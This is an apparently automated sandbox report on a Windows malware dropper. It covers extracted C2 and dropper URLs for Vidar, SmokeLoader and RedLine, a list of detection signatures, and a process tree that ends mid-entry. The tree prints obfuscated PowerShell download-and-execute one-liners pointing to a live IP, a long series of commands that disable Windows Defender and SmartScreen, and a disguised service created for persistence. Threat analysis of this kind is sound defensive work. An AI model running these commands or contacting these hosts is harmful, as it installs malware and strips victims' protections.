Analysis

  • max time kernel
    130s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    12-03-2022 01:25

General

  • Target

    a7d081524b46dbe2d485c2d76b71b3a701ac8a6f429c8683054ddca71add0904.exe

  • Size

    3.1MB

  • MD5

    76571357856ed2c68b1d03e9465c7a0e

  • SHA1

    df213aaa224d13a118287256c4d207cc28b90330

  • SHA256

    a7d081524b46dbe2d485c2d76b71b3a701ac8a6f429c8683054ddca71add0904

  • SHA512

    cd7fcd4a6f692e4596bd8ea8c2381a9170da13723c5519cdc84c8e54c19e503283a93cbe4be0e7b8de4e9c97b49ec0d09d3caa7678ce51b8c0f9a8c9b53b627b

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

DomAni2

C2

flestriche.xyz:80

Extracted

Family

redline

Botnet

Lyla2

C2

bonezarisor.xyz:80

Attributes
  • auth_value

    de2a98abc502b86b809fbc366af9256a

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 13 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Generic Request to gate.php Dotted-Quad

    suricata: ET MALWARE Generic Request to gate.php Dotted-Quad

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 6 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 53 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible privilege escalation attempt 2 IoCs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 14 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 32 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 28 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 34 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a7d081524b46dbe2d485c2d76b71b3a701ac8a6f429c8683054ddca71add0904.exe
    "C:\Users\Admin\AppData\Local\Temp\a7d081524b46dbe2d485c2d76b71b3a701ac8a6f429c8683054ddca71add0904.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3956
      • C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_7.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3700
          • C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\arnatic_7.exe
            arnatic_7.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3712
            • C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\arnatic_7.exe
              C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\arnatic_7.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_6.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3784
          • C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\arnatic_6.exe
            arnatic_6.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:4040
            • C:\Users\Admin\Documents\1I7qX9OqEwAr73pdhugERiOT.exe
              "C:\Users\Admin\Documents\1I7qX9OqEwAr73pdhugERiOT.exe"
              6⤵
              • Executes dropped EXE
              PID:4592
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1256
                7⤵
                • Program crash
                PID:5796
            • C:\Users\Admin\Documents\SnqzHfQtPEQd0evdlUoCjRjM.exe
              "C:\Users\Admin\Documents\SnqzHfQtPEQd0evdlUoCjRjM.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              PID:2996
            • C:\Users\Admin\Documents\tGwD19uRLRJYOaVSMeVGUCu5.exe
              "C:\Users\Admin\Documents\tGwD19uRLRJYOaVSMeVGUCu5.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious use of SetWindowsHookEx
              PID:4092
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                7⤵
                • Blocklisted process makes network request
                • Adds Run key to start application
                • Suspicious use of AdjustPrivilegeToken
                PID:380
                • C:\Windows\SysWOW64\svchost.exe
                  "C:\Windows\System32\svchost.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:632
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 632 -s 504
                    9⤵
                    • Program crash
                    PID:1732
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                7⤵
                • Blocklisted process makes network request
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:3160
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  8⤵
                    PID:6032
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                  7⤵
                  • Blocklisted process makes network request
                  • Adds Run key to start application
                  • Checks processor information in registry
                  • Suspicious use of AdjustPrivilegeToken
                  PID:872
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1860
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                    8⤵
                      PID:4192
                      • C:\Windows\SysWOW64\attrib.exe
                        attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                        9⤵
                        • Views/modifies file attributes
                        PID:4432
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c attrib +s +h C:\ProgramData\OneDrive
                      8⤵
                        PID:4336
                        • C:\Windows\SysWOW64\attrib.exe
                          attrib +s +h C:\ProgramData\OneDrive
                          9⤵
                          • Views/modifies file attributes
                          PID:6008
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -exec bypass start-process C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs
                        8⤵
                          PID:5908
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs"
                            9⤵
                              PID:1704
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\Offer.bat" "
                                10⤵
                                • Checks computer location settings
                                PID:3760
                                • C:\Users\Admin\AppData\Roaming\OneDrive\Offer.exe
                                  Offer.exe
                                  11⤵
                                    PID:3568
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 4
                                    11⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Delays execution with timeout.exe
                                    PID:3636
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                    11⤵
                                      PID:5904
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                      11⤵
                                        PID:6076
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                        11⤵
                                          PID:3424
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                          11⤵
                                            PID:4288
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                            11⤵
                                              PID:2888
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                              11⤵
                                                PID:4196
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                11⤵
                                                  PID:4912
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                  11⤵
                                                    PID:3632
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                    11⤵
                                                      PID:5124
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                      11⤵
                                                        PID:4104
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
                                                        11⤵
                                                          PID:5568
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
                                                          11⤵
                                                            PID:4712
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f
                                                            11⤵
                                                              PID:5456
                                                            • C:\Windows\SysWOW64\takeown.exe
                                                              takeown /f "C:\Windows\System32\smartscreen.exe" /a
                                                              11⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:2540
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls "C:\Windows\System32\smartscreen.exe" /grant:r Administrators:F /c
                                                              11⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:5288
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im smartscreen.exe /f
                                                              11⤵
                                                              • Kills process with taskkill
                                                              PID:5536
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable
                                                              11⤵
                                                                PID:1812
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefreshTask" /Disable
                                                                11⤵
                                                                  PID:4876
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                  11⤵
                                                                    PID:5296
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                    11⤵
                                                                      PID:5652
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                      11⤵
                                                                        PID:5304
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                        11⤵
                                                                          PID:6016
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                          11⤵
                                                                            PID:5276
                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                            sc stop WinDefend
                                                                            11⤵
                                                                              PID:5700
                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                              sc stop WdNisDrv
                                                                              11⤵
                                                                                PID:5236
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc stop WdNisSvc
                                                                                11⤵
                                                                                  PID:1720
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  sc stop WdFilter
                                                                                  11⤵
                                                                                    PID:1340
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc stop WdBoot
                                                                                    11⤵
                                                                                      PID:5444
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                      11⤵
                                                                                        PID:5140
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                        11⤵
                                                                                          PID:5228
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                          11⤵
                                                                                            PID:5676
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                            11⤵
                                                                                              PID:2196
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                              11⤵
                                                                                                PID:4360
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                11⤵
                                                                                                  PID:5656
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                  11⤵
                                                                                                    PID:4032
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                    11⤵
                                                                                                      PID:1712
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                      11⤵
                                                                                                        PID:3020
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                        11⤵
                                                                                                          PID:1456
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout /t 2
                                                                                                          11⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:5268
                                                                                              • C:\Users\Admin\Documents\FwQm2aGvg2oFqRkrE31Wq8SO.exe
                                                                                                "C:\Users\Admin\Documents\FwQm2aGvg2oFqRkrE31Wq8SO.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3968
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 432
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:3056
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 440
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:3268
                                                                                              • C:\Users\Admin\Documents\CoMuZKSGvBSyi48qwzppPmGB.exe
                                                                                                "C:\Users\Admin\Documents\CoMuZKSGvBSyi48qwzppPmGB.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks computer location settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2892
                                                                                                • C:\Users\Admin\AppData\Local\Temp\045f8720-571b-46ed-bea5-43e695c11c75.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\045f8720-571b-46ed-bea5-43e695c11c75.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks processor information in registry
                                                                                                  PID:3748
                                                                                              • C:\Users\Admin\Documents\T6JGVILm8mcCodpFopowGTNh.exe
                                                                                                "C:\Users\Admin\Documents\T6JGVILm8mcCodpFopowGTNh.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks computer location settings
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:5096
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5368
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                  7⤵
                                                                                                    PID:5276
                                                                                                • C:\Users\Admin\Documents\FeXbIAxP8hWk1H6_qmeC86L4.exe
                                                                                                  "C:\Users\Admin\Documents\FeXbIAxP8hWk1H6_qmeC86L4.exe"
                                                                                                  6⤵
                                                                                                    PID:632
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4FBAK.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\4FBAK.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2028
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E0LK3.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\E0LK3.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:3940
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\218826CE4EH34IJ.exe
                                                                                                      https://iplogger.org/1nChi7
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5280
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8C636.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\8C636.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5248
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8C636.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\8C636.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5204
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\L4KF0.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\L4KF0.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3992
                                                                                                  • C:\Users\Admin\Documents\wxLS_oflLOAo_7IEv_qFDR0F.exe
                                                                                                    "C:\Users\Admin\Documents\wxLS_oflLOAo_7IEv_qFDR0F.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks computer location settings
                                                                                                    • Adds Run key to start application
                                                                                                    PID:2044
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ernpmqry.exe" C:\Windows\SysWOW64\zmxgodr\
                                                                                                      7⤵
                                                                                                        PID:5992
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\zmxgodr\
                                                                                                        7⤵
                                                                                                          PID:5848
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          "C:\Windows\System32\sc.exe" create zmxgodr binPath= "C:\Windows\SysWOW64\zmxgodr\ernpmqry.exe /d\"C:\Users\Admin\Documents\wxLS_oflLOAo_7IEv_qFDR0F.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                          7⤵
                                                                                                            PID:6132
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            "C:\Windows\System32\sc.exe" description zmxgodr "wifi internet conection"
                                                                                                            7⤵
                                                                                                              PID:2228
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              "C:\Windows\System32\sc.exe" start zmxgodr
                                                                                                              7⤵
                                                                                                                PID:5496
                                                                                                              • C:\Windows\SysWOW64\netsh.exe
